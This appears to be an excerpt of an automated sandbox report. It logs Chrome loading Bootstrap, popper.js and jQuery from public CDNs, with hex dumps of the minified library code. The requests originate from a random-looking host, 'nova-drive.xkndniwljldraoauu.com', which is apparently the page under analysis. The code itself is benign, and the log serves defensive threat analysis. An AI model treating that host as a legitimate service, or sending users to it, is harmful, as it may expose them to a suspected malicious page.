                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74
                                                                                                                                                                Data Ascii: Class(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribut
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43
                                                                                                                                                                Data Ascii: i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={AC
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54
                                                                                                                                                                Data Ascii: erval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_IT
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42
                                                                                                                                                                Data Ascii: tarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemB
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22
                                                                                                                                                                Data Ascii: latedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+"
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c
                                                                                                                                                                Data Ascii: ction(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.col


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.2.449757104.17.24.144434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:00 UTC625OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:01 UTC959INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:01 GMT
                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                                ETag: W/"5eb03fa9-4af4"
                                                                                                                                                                Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                Age: 1372269
                                                                                                                                                                Expires: Thu, 13 Nov 2025 19:36:01 GMT
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TmoFHhIFM7pZ2c99oTpWRtz7fw6RJ91JPrcSGiWNLQLu%2F20dP6szcC4l6%2FKDBnScLoih7EEbsFz%2FMOJWHhgFGDGqGpz53JDbgDMdJ7UYMT9LfuFSHeqV82Q6o4fIkXowU2YpLORG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8e739b0eaeea4362-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-11-23 19:36:01 UTC410INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                                                Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27
                                                                                                                                                                Data Ascii: e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document'
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65
                                                                                                                                                                Data Ascii: var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['borde
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e
                                                                                                                                                                Data Ascii: :p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64
                                                                                                                                                                Data Ascii: ht:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.wid
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e
                                                                                                                                                                Data Ascii: .warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instan
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69
                                                                                                                                                                Data Ascii: s.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passi
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75
                                                                                                                                                                Data Ascii: rn o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){retu
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                Data Ascii: rn''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d
                                                                                                                                                                Data Ascii: rn o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o]


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.2.449755151.101.194.1374434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:00 UTC591OUTGET /jquery-3.4.1.js HTTP/1.1
                                                                                                                                                                Host: code.jquery.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:01 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 280364
                                                                                                                                                                Server: nginx
                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                ETag: "28feccc0-4472c"
                                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Age: 1571514
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:01 GMT
